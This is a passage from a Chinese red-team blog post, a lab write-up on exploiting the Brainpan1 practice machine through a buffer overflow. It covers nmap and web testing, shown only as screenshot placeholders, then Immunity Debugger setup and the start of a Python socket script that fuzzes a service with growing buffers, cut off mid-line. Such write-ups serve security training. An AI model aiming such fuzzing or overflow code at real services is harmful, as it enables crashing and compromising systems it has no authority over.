第十一篇红队笔记-百靶精讲之Brainpan1-缓存区溢出

zgcadmin

于 2024-06-08 00:15:05 发布

阅读量1k

点赞数 8

CC 4.0 BY-SA版权

文章标签：笔记缓存

本文链接：https://blog.youkuaiyun.com/admin741admin/article/details/129799878

nmap扫描

在这里插入图片描述

web渗透测试

在这里插入图片描述

缓冲区溢出漏洞识别

查看文件
通过Immunity Debugger查看exe内存动态变化
- 需要点击开始，右下角runing状态,此时相当于运行该exe
编写py脚本判断是否存在缓冲溢出

#! /usr/bin/python

import socket
import time
import sys

size = 100
server = str(sys.argv[1])
port = int(sys.argv[2])

while True:
    try:
        print("\n[+] buffer is %s byets" % size);
        buffer = "A" * size
        s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((server,port))
        print(buffer+"1")
        s.send(buffer.